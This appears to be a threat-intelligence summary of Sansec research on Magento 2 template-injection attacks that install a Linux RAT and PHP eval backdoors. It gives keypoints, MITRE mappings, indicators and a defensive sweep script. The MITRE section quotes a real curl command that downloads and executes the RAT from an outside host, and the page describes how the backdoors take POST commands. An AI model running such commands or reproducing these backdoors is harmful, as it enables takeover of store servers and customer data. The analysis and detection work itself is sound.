Magento 2 template attacks now deliver persistent malware: the injected template code installs a Linux RAT and PHP web backdoors, giving the attacker ongoing access and remote command execution, including across multi-node Magento clusters. Three variants are described, named after their artefacts (223sam.jpg, health_check.php and Interceptor.php), with indicators tying the traffic to Bulgarian C2 domains and specific attacker infrastructure. #223sam.jpg_attack #health_check.php_attack #Interceptor.php_attack #FishPig #Magento #dev-clientservice.com #mailchimp-addons.com #allsecurehosting.com #Bulgaria
Keypoints
- Attacks unfold through interactive Magento checkout flows, not purely automated processes.
- The 223sam.jpg variant downloads a Linux executable named 223sam.jpg, saves it as "cli" and runs it as a background RAT that polls a Bulgarian C2 server.
- The RAT has full access to the database and running PHP processes and can be injected across nodes in a multi-server Magento cluster.
- The health_check.php variation decodes a base64-encoded payload and writes a PHP backdoor (health_check.php) to pub/media; the backdoor executes commands supplied in a POST parameter.
- The interceptor-based attack overwrites Magento's generated code at generated/code/Magento/Framework/App/FrontController/Interceptor.php with an eval backdoor, which therefore runs on every Magento page request; a POST to /catalogsearch/result/?q=bestone is noted as the entry point.
- Multiple domains and IPs are associated with the campaigns, including dev-clientservice.com, mailchimp-addons.com, allsecurehosting.com, and IPs 45.128.199.3, 45.134.20.11, 86.104.15.60.
- Attack patterns resemble a prior FishPig attack, suggesting a potential shared actor; Sansec eComscan is highlighted as a detector for the injected RAT.
MITRE Techniques
- [T1105] Ingress Tool Transfer — the attacker downloads a Linux executable with curl and executes it: "This downloads a Linux executable called 223sam.jpg and launches it as a background process called cli."
- [T1059] Command and Scripting Interpreter — the payload runs through Unix shell commands and PHP (base64_decode and eval): "cd pub; cd media;curl https://theroots.in/pub/media/avatar/223sam.jpg -o cli && chmod +x cli&&./cli;" and "eval" backdoors are demonstrated.
- [T1574] Hijack Execution Flow — the attacker overwrites generated/code/Magento/Framework/App/FrontController/Interceptor.php, code that Magento loads while handling every request, so the backdoor runs on every page view: "This will execute another typical PHP eval backdoor:" (The dropped body is itself a web shell, T1505.003.)
- [T1071.001] Web Protocols — the RAT polls its control servers over HTTP(S) (dev-clientservice.com, mailchimp-addons.com, allsecurehosting.com) and the PHP backdoors take their commands in web requests: "The RAT invocation as … is reminiscent of the backdoored FishPig attack" and "The malware is executed on every Magento page request."
- [T1505.003] Server Software Component: Web Shell — health_check.php is a PHP web shell that executes whatever the attacker sends in a POST parameter: "It contains a generic eval backdoor accepting commands via the POST ata parameter:"
- [T1190] Exploit Public-Facing Application — the template injection arrives through the store's own checkout flow and executes on whichever node handles the request, so in a load-balanced deployment any node can be compromised: "the RAT can be injected on any of the nodes in a multi-server cluster environment."
Indicators of Compromise
- [IP Address] 45.128.199.3, 45.134.20.11, 86.104.15.60 — attacker infrastructure
- [Domain/URL] dev-clientservice.com, mailchimp-addons.com, allsecurehosting.com — command-and-control or hosting for malicious payloads
- [Domain/URL] theroots.in (https://theroots.in/pub/media/avatar/223sam.jpg) — download location of the RAT in the quoted curl command
- [File] 223sam.jpg — a Linux executable downloaded by the attacker, saved as cli and executed
- [File] health_check.php — the PHP backdoor written by the health_check variation
- [Path] pub/media/cli (the downloaded RAT), pub/media/health_check.php and generated/code/Magento/Framework/App/FrontController/Interceptor.php — locations of the payloads on a compromised store; pub/media/avatar/223sam.jpg is the path on the download host
- [URI] POST /catalogsearch/result/?q=bestone — the request noted as the entry point for the Interceptor.php backdoor
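The keypoints and indicators above translate directly into a file-system sweep. The script below is an added example, not Sansec's code and not eComscan: it walks a Magento 2 document root for the three artefact classes this page describes (PHP or ELF files under pub/media, eval()/base64_decode() inside generated/code, and the listed domains, IPs and download host anywhere in the tree). It assumes the standard Magento 2 layout (pub/media, generated/code) and a POSIX shell with find, grep -r, head -c and od; the script name magento_ioc_sweep.sh is hypothetical.

```shell
#!/bin/sh
# Added example (not Sansec's code): sweep a Magento 2 document root for the
# artefacts described on this page. Assumes the standard Magento 2 layout
# (pub/media for uploads, generated/code for autogenerated classes). A narrow
# heuristic check, not a replacement for a full scanner such as eComscan.

# Infrastructure strings taken from the page: C2/hosting domains, IPs, and the
# host in the quoted curl command that fetched 223sam.jpg.
IOC_STRINGS="
dev-clientservice.com
mailchimp-addons.com
allsecurehosting.com
45.128.199.3
45.134.20.11
86.104.15.60
theroots.in
"

# Print one "<kind>: <path>" line per finding for the Magento root in $1.
scan_magento_root() {
    root=$1

    # 1. pub/media holds uploads only. A PHP file there (health_check.php) or an
    #    ELF binary (the 223sam.jpg download saved as "cli") is foreign.
    if [ -d "$root/pub/media" ]; then
        find "$root/pub/media" -type f | while IFS= read -r f; do
            case "$f" in
                *.php|*.phtml) echo "php-in-media: $f"; continue ;;
            esac
            magic=$(head -c 4 "$f" 2>/dev/null | od -An -tx1 | tr -d ' \n')
            if [ "$magic" = 7f454c46 ]; then
                echo "elf-in-media: $f"
            fi
        done
    fi

    # 2. generated/code is written by Magento's code generator and never contains
    #    eval() or base64_decode(). The page names FrontController/Interceptor.php,
    #    which runs on every request, but any generated file is suspect.
    if [ -d "$root/generated/code" ]; then
        grep -rlE 'eval *\(|base64_decode *\(' "$root/generated/code" 2>/dev/null \
            | sed 's/^/eval-in-generated: /'
    fi

    # 3. Known attacker infrastructure referenced anywhere under the root
    #    (code, templates, generated classes, logs). Slow on very large trees.
    set --
    for s in $IOC_STRINGS; do set -- "$@" -e "$s"; done
    grep -rlF "$@" "$root" 2>/dev/null | sed 's/^/ioc-string: /'
}

# Number of findings as a bare integer (handy for cron or monitoring).
count_findings() {
    n=$(scan_magento_root "$1" | wc -l)
    echo $((n + 0))
}

# Live check for the background RAT process the page describes ("cli").
# Not exercised by the offline fixture; ps output varies between systems.
check_cli_process() {
    ps -eo pid,comm,args 2>/dev/null | awk '$2 == "cli" { print "rat-process: " $0 }'
}

if [ "$#" -gt 0 ]; then
    scan_magento_root "$1"
    check_cli_process
fi
```

Run it as `sh magento_ioc_sweep.sh /var/www/html` on each node of a cluster, since the page notes the RAT can land on any of them. A hit in generated/code is worth acting on immediately: that directory can be regenerated from source (`bin/magento setup:di:compile`) and should never contain eval(). An ELF file in pub/media should be preserved for analysis before the process is killed, as it is the only copy of the RAT a defender will have.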
Read more: https://sansec.io/research/magento-2-template-attacks